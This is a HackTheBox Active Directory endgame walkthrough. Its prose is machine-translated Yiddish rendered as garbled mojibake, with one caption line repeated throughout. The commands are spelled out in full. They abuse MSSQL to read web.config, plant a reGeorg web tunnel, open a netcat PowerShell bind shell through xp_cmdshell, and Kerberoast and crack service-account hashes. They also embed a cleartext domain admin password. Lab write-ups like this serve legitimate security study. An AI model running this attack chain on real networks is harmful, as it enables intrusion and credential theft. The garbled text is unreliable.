ืื•ืŸ ืื™ืฆื˜ ืžื™ืจ ืคืึทืจื‘ื™ื ื“ืŸ ืžื™ื˜ ื“ื™ ืงืจืึทื“ืขื ื˜ืฉืึทืœื– ืคื•ืŸ ื“ื™ ื ื™ื™ึทืข ื‘ืึทื ื™ืฆืขืจ, ืžื™ืจ ืึธื‘ืกืขืจื•ื•ื™ืจืŸ ื“ื™ ื ื™ื™ึทืข ืคืึธืŸ ื“ืึทื˜ืึทื‘ื™ื™ืก.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืžื™ืจ ื’ืขื‘ืŸ ืื™ื‘ืขืจ ื“ืขื ืคืึธืŸ ืื•ืŸ ื’ื™ื™ืŸ ืื•ื™ืฃ.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ื‘ืึทืงื˜ืจืึทืงืง ืคืึธืŸ

ืœืึธืžื™ืจ ื‘ืึทืงื•ืžืขืŸ ืึท ืฉืึธืœ ื ื™ืฆืŸ MSSQL, ืื™ืš ื ื•ืฆืŸ mssqlclient ืคึฟื•ืŸ ื“ื™ ื™ืžืคึผืึทืงื˜ ืคึผืขืงืœ.

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืžื™ืจ ื“ืึทืจืคึฟืŸ ืฆื• ื‘ืึทืงื•ืžืขืŸ ืคึผืึทืกื•ื•ืขืจื“ื–, ืื•ืŸ ื“ืขืจ ืขืจืฉื˜ืขืจ ื–ืึทืš ืžื™ืจ ื”ืึธื‘ืŸ ืฉื•ื™ืŸ ื’ืขืคึผืœืึธื ื˜ืขืจื˜ ืื™ื– ืึท ื•ื•ืขื‘ื–ื™ื™ื˜ืœ. ืื–ื•ื™, ืžื™ืจ ื“ืึทืจืคึฟืŸ ืึท ื•ื•ืขื‘ ืกืขืจื•ื•ืขืจ ืงืึทื ืคื™ื’ื™ืขืจื™ื™ืฉืึทืŸ (ืขืก ืื™ื– ื ื™ื˜ ืžืขื’ืœืขืš ืฆื• ืœืึธื–ืŸ ืึท ื‘ืึทืงื•ื•ืขื ืฉืึธืœ, ืžืฉืžืขื•ืช ื“ื™ ืคื™ื™ืจื•ื•ืึทืœ ืื™ื– ืคืœื™ืกื ื“ื™ืง).

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื‘ืขืจ ืฆื•ื˜ืจื™ื˜ ืื™ื– ื’ืขืœื™ื™ืงื ื˜. ื›ืึธื˜ืฉ ืžื™ืจ ืงืขื ืขืŸ ืœื™ื™ืขื ืขืŸ ื“ื™ ื˜ืขืงืข ืคึฟื•ืŸ MSSQL, ืžื™ืจ ื ืึธืจ ื“ืึทืจืคึฟืŸ ืฆื• ื•ื•ื™ืกืŸ ื•ื•ืึธืก ืคึผืจืึธื’ืจืึทืžืžื™ื ื’ ืฉืคึผืจืึทื›ืŸ ื–ืขื ืขืŸ ืงืึทื ืคื™ื’ื™ืขืจื“. ืื•ืŸ ืื™ืŸ ื“ื™ MSSQL ื•ื•ืขื’ื•ื•ื™ื™ึทื–ืขืจ ืžื™ืจ ื’ืขืคึฟื™ื ืขืŸ ืึทื– ืขืก ืื™ื– ืคึผื™ื˜ื”ืึธืŸ.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ื“ืขืจื ืึธืš ืขืก ืื™ื– ืงื™ื™ืŸ ืคึผืจืึธื‘ืœืขื ืฆื• ืœื™ื™ืขื ืขืŸ ื“ื™ ื•ื•ืขื‘.ืงืึธื ืคื™ื’ ื˜ืขืงืข.

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืžื™ื˜ ื“ื™ ื’ืขืคึฟื•ื ืขืŸ ืงืจืึทื“ืขื ื˜ืฉืึทืœื–, ื’ื™ื™ืŸ ืฆื• / ืึทื“ืžื™ืŸ ืื•ืŸ ื ืขืžืขืŸ ื“ื™ ืคืึธืŸ.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืคืึธืึธื˜ื”ืึธืœื“ ืคืึธืŸ

ืื™ืŸ ืคืึทืงื˜, ืขืก ื–ืขื ืขืŸ ืขื˜ืœืขื›ืข ื™ื ืงืึทื ื•ื•ื™ื ื™ืึทื ืกื™ื– ืคื•ืŸ ื ื™ืฆืŸ ืึท ืคื™ื™ืจื•ื•ืึทืœ, ืึธื‘ืขืจ ืื™ืจ ื–ื•ื›ื˜ ื“ื•ืจืš ื“ื™ ื ืขืฅ ืกืขื˜ื˜ื™ื ื’ืก, ืžื™ืจ ื‘ืึทืžืขืจืงืŸ ืึทื– IPv6 ืื™ื– ืื•ื™ืš ื’ืขื ื™ืฆื˜!

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืœืึธืžื™ืจ ืœื™ื™ื’ืŸ ื“ืขื ืึทื“ืจืขืก ืฆื• /etc/hosts.
dead:babe::1001 poo6.htb
ืœืึธืžื™ืจ ื™ื‘ืขืจืงื•ืงืŸ ื“ืขื ื‘ืึทืœืขื‘ืึธืก ื•ื•ื™ื“ืขืจ, ืึธื‘ืขืจ ื ื™ืฆืŸ ื“ื™ IPv6 ืคึผืจืึธื˜ืึธืงืึธืœ.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื•ืŸ ื“ื™ WinRM ืกืขืจื•ื•ื™ืก ืื™ื– ื‘ืืจืขื›ื˜ื™ื’ื˜ ืื™ื‘ืขืจ IPv6. ื–ืืœ ืก ืคืึทืจื‘ื™ื ื“ืŸ ืžื™ื˜ ื“ื™ ื’ืขืคึฟื•ื ืขืŸ ืงืจืึทื“ืขื ื˜ืฉืึทืœื–.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืขืก ืื™ื– ืึท ืคืึธืŸ ืื•ื™ืฃ ื“ื™ ื“ืขืกืงื˜ืึทืคึผ, ืžื™ืจ ื’ืขื‘ืŸ ืขืก ืื™ื‘ืขืจ.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืคึผ00ื ืขื“ ืคืึธืŸ

ื ืึธืš ืงืึทื ื“ืึทืงื˜ื™ื ื’ ืจื™ืงืึทื ืึทืกืึทื ืก ืื•ื™ืฃ ื“ืขืจ ื‘ืึทืœืขื‘ืึธืก ื ื™ืฆืŸ ื•ื•ื™ื ืคึผืขืึทืก ืžื™ืจ ื’ืขืคึฟื™ื ืขืŸ ื ื™ื˜ ืขืคึผืขืก ืกืคึผืขืฆื™ืขืœ. ื“ืขืจื ืึธืš ืขืก ืื™ื– ื‘ืึทืฉืœืึธืกืŸ ืฆื• ืงื•ืงืŸ ืคึฟืึทืจ ืงืจืึทื“ืขื ื˜ืฉืึทืœื– ื•ื•ื™ื“ืขืจ (ืื™ืš ืื•ื™ืš ื’ืขืฉืจื™ื‘ืŸ ืื•ื™ืฃ ื“ืขื ื˜ืขืžืข ืึทืจื˜ื™ืงืœ). ืึธื‘ืขืจ ืื™ืš ืงืขืŸ ื ื™ืฉื˜ ื‘ืึทืงื•ืžืขืŸ ืึทืœืข ื“ื™ SPNs ืคึฟื•ืŸ ื“ื™ ืกื™ืกื˜ืขื ื“ื•ืจืš WinRM.

setspn.exe -T intranet.poo -Q */*

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืœืึธืžื™ืจ ืœื•ื™ืคืŸ ื“ื™ ื‘ืึทืคึฟืขืœ ื“ื•ืจืš MSSQL.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืžื™ื˜ ื“ืขื ืื•ืคึฟืŸ, ืžื™ืจ ื‘ืึทืงื•ืžืขืŸ ื“ื™ SPN ืคื•ืŸ ื ื™ืฆืขืจืก p00_hr ืื•ืŸ p00_adm, ื•ื•ืึธืก ืžื™ื˜ืœ ืึทื– ื–ื™ื™ ื–ืขื ืขืŸ ืฉืคึผื™ืจืขื•ื•ื“ื™ืง ืฆื• ืึท ื‘ืึทืคืึทืœืŸ ืึทื–ืึท ื•ื•ื™ Kerberoasting. ืื™ืŸ ืงื•ืจืฅ, ืžื™ืจ ืงืขื ืขืŸ ื‘ืึทืงื•ืžืขืŸ ื–ื™ื™ืขืจ ืคึผืึทืจืึธืœ ื”ืึทืฉืขืก.

ืขืจืฉื˜ืขืจ ืื™ืจ ื“ืึทืจืคึฟืŸ ืฆื• ื‘ืึทืงื•ืžืขืŸ ืึท ืกื˜ืึทื‘ื™ืœ ืฉืึธืœ ื•ื•ื™ ืึท MSSQL ื‘ืึทื ื™ืฆืขืจ. ืึธื‘ืขืจ ื–ื™ื ื˜ ืžื™ืจ ื–ืขื ืขืŸ ืœื™ืžื™ื˜ืขื“ ืื™ืŸ ืึทืงืกืขืก, ืžื™ืจ ื”ืึธื‘ืŸ ืงืึธืžื•ื ื™ืงืึทืฆื™ืข ืžื™ื˜ ื“ืขืจ ื‘ืึทืœืขื‘ืึธืก ื‘ืœื•ื™ื– ื“ื•ืจืš ืคึผืึธืจืฅ 80 ืื•ืŸ 1433. ืึธื‘ืขืจ ืขืก ืื™ื– ืžืขื’ืœืขืš ืฆื• ื˜ื•ื ืขืœ ืคืึทืจืงืขืจ ื“ื•ืจืš ืคึผืึธืจื˜ 80! ืคึฟืึทืจ ื“ืขื ืžื™ืจ ื•ื•ืขืœืŸ ื ื•ืฆืŸ ื“ื™ ืคืืœื’ืขื ื“ืข ืึทืคึผืœืึทืงื™ื™ืฉืึทืŸ. ืœืึธืžื™ืจ ืฆื•ืคึฟืขืœื™ืงืขืจ ื“ื™ ื˜ืขืงืข tunnel.aspx ืฆื• ื“ื™ ื”ื™ื™ื ื•ื•ืขื’ื•ื•ื™ื™ึทื–ืขืจ ืคื•ืŸ ื“ื™ ื•ื•ืขื‘ ืกืขืจื•ื•ืขืจ - C: inetpubwwwroot.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื‘ืขืจ ื•ื•ืขืŸ ืžื™ืจ ืคึผืจื•ื‘ื™ืจืŸ ืฆื• ืึทืงืกืขืก ืขืก, ืžื™ืจ ื‘ืึทืงื•ืžืขืŸ ืึท ื˜ืขื•ืช 404. ื“ืขื ืžื™ื˜ืœ ืึทื– *.ืึทืกืคึผืงืก ื˜ืขืงืขืก ื–ืขื ืขืŸ ื ื™ืฉื˜ ืขืงืกืึทืงื™ื•ื˜ืึทื“. ื›ึผื“ื™ ื˜ืขืงืขืก ืžื™ื˜ ื“ื™ ื™ืงืกื˜ืขื ืฉืึทื ื– ื–ืึธืœ ื–ื™ื™ืŸ ืขืงืกืึทืงื™ื•ื˜ืึทื“, ื™ื ืกื˜ืึทืœื™ืจืŸ ASP.NET 4.5 ื•ื•ื™ ื’ื™ื™ื˜.

dism /online /enable-feature /all /featurename:IIS-ASPNET45

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื•ืŸ ืื™ืฆื˜, ื•ื•ืขืŸ ืžื™ืจ ืึทืงืกืขืก tunnel.aspx, ืžื™ืจ ื‘ืึทืงื•ืžืขืŸ ืึท ืขื ื˜ืคืขืจ ืึทื– ืึทืœืฅ ืื™ื– ื’ืจื™ื™ื˜ ืฆื• ื’ื™ื™ืŸ.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืœืึธืžื™ืจ ืงืึทื˜ืขืจ ื“ืขื ืงืœื™ืขื ื˜ ื˜ื™ื™ืœ ืคื•ืŸ ื“ื™ ืึทืคึผืœืึทืงื™ื™ืฉืึทืŸ, ื•ื•ืึธืก ื•ื•ืขื˜ ืจืขืœืข ืคืึทืจืงืขืจ. ืžื™ืจ ื•ื•ืขืœืŸ ืคืึธืจื•ื™ืก ืึทืœืข ืคืึทืจืงืขืจ ืคื•ืŸ ืคึผืึธืจื˜ 5432 ืฆื• ื“ื™ ืกืขืจื•ื•ืขืจ.

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื•ืŸ ืžื™ืจ ื ื•ืฆืŸ ืคึผืจืึทืงืกื™ื˜ืฉืึทื™ื ืก ืฆื• ืฉื™ืงืŸ ืคืึทืจืงืขืจ ืคื•ืŸ ืงื™ื™ืŸ ืึทืคึผืœืึทืงื™ื™ืฉืึทืŸ ื“ื•ืจืš ืื•ื ื“ื–ืขืจ ืคึผืจืึทืงืกื™. ืœืึธืžื™ืจ ืœื™ื™ื’ืŸ ื“ืขื ืคืจืืงืกื™ ืฆื• ื“ื™ ืงืึทื ืคื™ื’ื™ืขืจื™ื™ืฉืึทืŸ ื˜ืขืงืข /etc/proxychains.conf.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื™ืฆื˜ ืœืึธื–ืŸ ืก ืฆื•ืคึฟืขืœื™ืงืขืจ ื“ื™ ืคึผืจืึธื’ืจืึทื ืฆื• ื“ื™ ืกืขืจื•ื•ืขืจ ื ืขื˜ืงืึทื˜, ืžื™ื˜ ื•ื•ืึธืก ืžื™ืจ ื•ื•ืขืœืŸ ืžืึทื›ืŸ ืึท ืกื˜ืึทื‘ื™ืœ ื‘ื™ื ื“ืŸ ืฉืึธืœ ืื•ืŸ ืฉืจื™ืคื˜ ืึธื ืจื•ืคืŸ-ืงืขืจื‘ืขืจืึธืึทืกื˜, ืžื™ ื˜ ืฐืขืœื›ืข ืจ ืžื™ ืจ ืฐืขืœ ืŸ ื“ื•ืจื›ืคื™ืจ ืŸ ื ืงืขืจื‘ืขืจื•ืืกื˜ื™ื ื’ึพืื˜ืืง .

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื™ืฆื˜ ืžื™ืจ ืงืึทื˜ืขืจ ื“ื™ ืœื™ืกื ืขืจ ื“ื•ืจืš MSSQL.

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื•ืŸ ืžื™ืจ ืคืึทืจื‘ื™ื ื“ืŸ ื“ื•ืจืš ืื•ื ื“ื–ืขืจ ืคึผืจืึทืงืกื™.

proxychains rlwrap nc poo.htb 4321

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื•ืŸ ืœืึธืžื™ืจ ื ืขืžืขืŸ ื“ื™ ื›ืึทืฉื™ื–.

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ื•ื•ื™ื™ึทื˜ืขืจ ืื™ืจ ื“ืึทืจืคึฟืŸ ืฆื• ื™ื˜ืขืจื™ื™ื˜ ืื™ื‘ืขืจ ื“ื™ ื”ืึทืฉืขืก. ื–ื™ื ื˜ ื“ื™ Rockyou ื•ื•ืขืจื˜ืขืจื‘ื•ืš ื”ืื˜ ื ื™ืฉื˜ ืึทื ื˜ื”ืึทืœื˜ืŸ ื“ื™ ืคึผืึทืกื•ื•ืขืจื“ื–, ืื™ืš ื’ืขื•ื•ื™ื™ื ื˜ ืึทืœืข ื“ื™ ืคึผืึทืกื•ื•ืขืจื“ื– ื“ื™ืงืฉืึทื ืขืจื™ื– ืฆื•ื’ืขืฉื˜ืขืœื˜ ืื™ืŸ Seclists. ืคึฟืึทืจ ื“ื™ ื–ื•ื›ืŸ ืžื™ืจ ื ื•ืฆืŸ hashcat.

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

ืื•ืŸ ืžื™ืจ ื’ืขืคึฟื™ื ืขืŸ ื‘ื™ื™ื“ืข ืคึผืึทืกื•ื•ืขืจื“ื–, ื“ืขืจ ืขืจืฉื˜ืขืจ ืื™ืŸ ื“ื™ ื•ื•ืขืจื˜ืขืจื‘ื•ืš dutch_passwordlist.txt, ืื•ืŸ ื“ื™ ืจื’ืข ืื™ืŸ Keyboard-Combinations.txt.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื•ืŸ ืึทื–ื•ื™ ืžื™ืจ ื”ืึธื‘ืŸ ื“ืจื™ื™ ื™ื•ื–ืขืจื–, ืœืึธื–ืŸ ืื•ื ื“ื– ื’ื™ื™ืŸ ืฆื• ื“ื™ ืคืขืœื“ ืงืึทื ื˜ืจืึธื•ืœืขืจ. ืขืจืฉื˜ืขืจ ืžื™ืจ ื’ืขืคึฟื™ื ืขืŸ ืื•ื™ืก ื–ื™ื™ืŸ ืึทื“ืจืขืก.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ื’ืจื•ื™ืก, ืžื™ืจ ื’ืขืคึฟื•ื ืขืŸ ื“ื™ IP ืึทื“ืจืขืก ืคื•ืŸ ื“ื™ ืคืขืœื“ ืงืึทื ื˜ืจืึธื•ืœืขืจ. ืœืึธืžื™ืจ ื’ืขืคึฟื™ื ืขืŸ ืึทืœืข ื“ื™ ื ื™ืฆืขืจืก ืคื•ืŸ ื“ื™ ืคืขืœื“, ืื•ืŸ ื•ื•ืึธืก ืคื•ืŸ ื–ื™ื™ ืื™ื– ืึท ืึทื“ืžื™ื ื™ืกื˜ืจืึทื˜ืึธืจ. ืฆื• ืึธืคึผืœืึธื“ื™ืจืŸ ื“ื™ ืฉืจื™ืคื˜ ืฆื• ื‘ืึทืงื•ืžืขืŸ ืื™ื ืคึฟืึธืจืžืึทืฆื™ืข PowerView.ps1. ื“ืขืจื ืึธืš ืžื™ืจ ื•ื•ืขืœืŸ ืคืึทืจื‘ื™ื ื“ืŸ ืžื™ื˜ Evil-winrm, ืกืคึผืขืฆื™ืคื™ืฆื™ืจืŸ ื“ื™ ื•ื•ืขื’ื•ื•ื™ื™ึทื–ืขืจ ืžื™ื˜ ื“ื™ ืฉืจื™ืคื˜ ืื™ืŸ ื“ื™ -s ืคึผืึทืจืึทืžืขื˜ืขืจ. ืื•ืŸ ื“ืขืžืึธืœื˜ ืžื™ืจ ื ืึธืจ ืœืึธื“ืŸ ื“ื™ PowerView ืฉืจื™ืคื˜.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื™ืฆื˜ ืžื™ืจ ื”ืึธื‘ืŸ ืฆื•ื˜ืจื™ื˜ ืฆื• ืึทืœืข ื–ื™ื™ึทืŸ ืคืึทื ื’ืงืฉืึทื ื–. ื“ืขืจ p00_adm ื‘ืึทื ื™ืฆืขืจ ืงื•ืงื˜ ื•ื•ื™ ืึท ืคึผืจื™ื•ื•ืœื™ื“ื–ืฉื“ ื‘ืึทื ื™ืฆืขืจ, ืึทื–ื•ื™ ืžื™ืจ ื•ื•ืขืœืŸ ืึทืจื‘ืขื˜ืŸ ืื™ืŸ ื–ื™ื™ืŸ ืงืึธื ื˜ืขืงืกื˜. ืœืึธืžื™ืจ ืžืึทื›ืŸ ืึท PSCredential ื›ื™ื™ืคืขืฅ ืคึฟืึทืจ ื“ืขื ื‘ืึทื ื™ืฆืขืจ.

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

ืื™ืฆื˜ ืึทืœืข ืคึผืึธื•ื•ืขืจืฉืขืœืœ ืงืึทืžืึทื ื“ื– ื•ื•ื• ืžื™ืจ ืกืคึผืขืฆื™ืคื™ืฆื™ืจืŸ ืงืจืขื“ืก ื•ื•ืขื˜ ื–ื™ื™ืŸ ืขืงืกืึทืงื™ื•ื˜ืึทื“ ื•ื•ื™ p00_adm. ืœืึธื–ืŸ ืื•ื ื“ื– ื•ื•ื™ื™ึทื–ืŸ ืึท ืจืฉื™ืžื” ืคื•ืŸ ื™ื•ื–ืขืจื– ืื•ืŸ ื“ื™ ืึทื˜ืจื™ื‘ื™ื•ื˜ ืคื•ืŸ AdminCount.

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื•ืŸ ืึทื–ื•ื™, ืื•ื ื“ื–ืขืจ ื‘ืึทื ื™ืฆืขืจ ืื™ื– ื˜ืึทืงืข ื–ื•ื›ื”. ืœืึธืžื™ืจ ื–ืขืŸ ืื™ืŸ ื•ื•ืึธืก ื’ืจื•ืคึผืขืก ืขืจ ืื™ื–.

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืžื™ืจ ืœืขืกืึธืฃ ื‘ืึทืฉื˜ืขื˜ื™ืงืŸ ืึทื– ื“ืขืจ ื‘ืึทื ื™ืฆืขืจ ืื™ื– ืึท ืคืขืœื“ ืึทื“ืžื™ื ื™ืกื˜ืจืึทื˜ืึธืจ. ื“ืึธืก ื’ื™ื˜ ืื™ื ื“ื™ ืจืขื›ื˜ ืฆื• ืจื™ืžืึธื•ื˜ืœื™ ืงืœืึธืฅ ืื•ื™ืฃ ืฆื• ื“ื™ ืคืขืœื“ ืงืึทื ื˜ืจืึธื•ืœืขืจ. ื–ืืœ ืก ืคึผืจื•ื‘ื™ืจืŸ ืœืึธื’ื™ื ื’ ืื™ืŸ ื“ื•ืจืš WinRM ื ื™ืฆืŸ ืื•ื ื“ื–ืขืจ ื˜ื•ื ืขืœ. ืื™ืš ืื™ื– ื’ืขื•ื•ืขืŸ ืฆืขืžื™ืฉื˜ ื“ื•ืจืš ื“ื™ ืขืจืจืึธืจืก ื’ืขืฉืืคืŸ ื“ื•ืจืš reGeorg ื•ื•ืขืŸ ืื™ืš ื ื•ืฆืŸ evil-winrm.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

